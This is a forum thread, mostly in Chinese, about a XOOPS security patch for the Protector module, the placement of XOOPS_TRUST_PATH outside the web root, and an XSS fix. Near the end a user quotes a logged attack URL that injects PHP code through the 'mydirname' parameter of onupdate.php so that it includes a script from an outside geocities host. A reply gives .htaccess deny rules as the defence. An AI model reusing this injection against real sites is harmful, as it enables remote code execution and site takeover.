关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复这似乎是 Protector 3.20,其中 protector.php 有一个关键的错误。
使用最新的Protector 3.21a 是否比 3.20b(Gijoe 未发布的)更好?
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复似乎他们解决了不同的问题。如果我没有弄错,DJ 在发布 3.21a 的时候向 GIJoe 通报了这个 XSS 问题。
我刚刚运行了 WinMerge,发现 3.20b 和 3.21a 之间没有重叠部分,所以我将它们合并成了 3.20c,并且看起来它能够正常工作。然而,我不是安全专家,所以请在使用 3.20c 时自行承担风险。
希望 GIJoe 能推出一个包含解决 XSS 问题新方案的新“官方”版本的 Protector。
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复我真的非常困惑,哪个版本更好或推荐版本是什么?
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复
http://xoops.peak.ne.jp/md/news/index.php?page=article&storyid=468
我真的非常困惑
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复无需困惑。
GIJoe said that XOOPS_TRUST_PATH should ideally be placed outside of DocumentRoot!
If you have read our Installation Guidelines, as well as our "A Guide to Make your XOOPS Installation even more secure", this point has been repeated again and again.
However, we are very well aware that for various reasons, some people stored XOOPS_TRUST_PATH inside DocumentRoot. Whether it is due to their host preventing them from doing so, or because they never read instructions.
Therefore, when we received a notification from Digital Security Research Group that there are vulnerabilities for those people, we have two options
a) ignore it and say: "since we told them to place XOOPS_TRUST_PATH outside of DocumentRoot, if they didn't do it, it's their problem and we don't care" or
b) or we can say "these are XOOPS users and we care about them, so even if they make a mistake and don't follow our advice, we will still try to protect them."
As a vendor, we believe we have the responsibility to help our users and look after them. And it is exactly what we have done here. Yes, if your XOOPS_TRUST_PATH is outside of DocumentRoot, you don't have to worry. But in today's survey, we would still find that many users haven't placed it outside.
For this reason, we say "Better safe than sorry" and that's why we provided this patch. We care about our users, and if we can save just one XOOPS user from being hacked, it's worth it for us!
I hope you'll agree with us.
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复感谢 Mamba
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复我们都认同用户将信任路径放在网站根目录内的现实,我们需要尽我们所能使产品安全。我认为让用户了解风险很重要,但与此同时,他们也需要承担一些责任。
关于如何向社区展示这一点的建议——
在未经主要安全人员的参与下发布一个与XOOPS相关的模块的安全补丁似乎相当自以为是。从GIJOE的文章中可以看出,这并没有发生。
此外,这个补丁实际上让用户更容易将他们的信任路径留在网站根目录内——你们应该追求更容易让他们将其放置在网站根目录之外的方法。结合你们带有信任路径在网站根目录内的分发软件包,并提供将其移至根目录之外的说明。最好默认将其留在根目录之外,然后在其他方法都失败后再让他们主动将其移入。
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复或许在上述原始信息中提到,如果你已经将“XOOPS信任路径”放置在正确的位置,你就无需下载这个补丁了,或者类似的话。我差点不必要地下载了它!
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复引用
或许在上述原始信息中提到,如果你已经将“XOOPS信任路径”放置在正确的位置,你就无需下载这个补丁了,或者类似的话。我差点不必要地下载了它!
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复引用
结合带着信任路径在网站根目录内的分发软件包,并提供将其移至根目录之外的说明。最好默认将其留在根目录之外,然后在其他方法都失败后再让他们主动将其移入。
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复引用
现在很多人因为网络根目录内的懒惰和无知而停止停留。
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复Mamba
干得好,感谢你在这方面的所有努力。看到并了解开发者正在尽最大的努力解决问题,无论问题大小如何,都是一件好事。
我,至少是,非常看重你的技能和努力,我相信很多人也是这样认为的。
Ted
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复我在查看如何从2.0.18.x升级,看到服务器日志中有许多这些问题。
引用
example.com/modules//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.geocities.com/coracore98/r0bot.txt??
关于 XOOPS 2.0.x 和 2.2.x 用户的安全修复你在受信任路径的根目录下有一个名为 .htaccess 的文件吗?
如果没有,那么做一下。它应该包含以下两行
order deny,allow
deny from all | Stats | |
| Goal: | $100.00 |
| Due Date: | Aug 31 |
| Gross Amount: | $0.00 |
| Net Balance: | $0.00 |
| Left to go: | $100.00 |
 |
|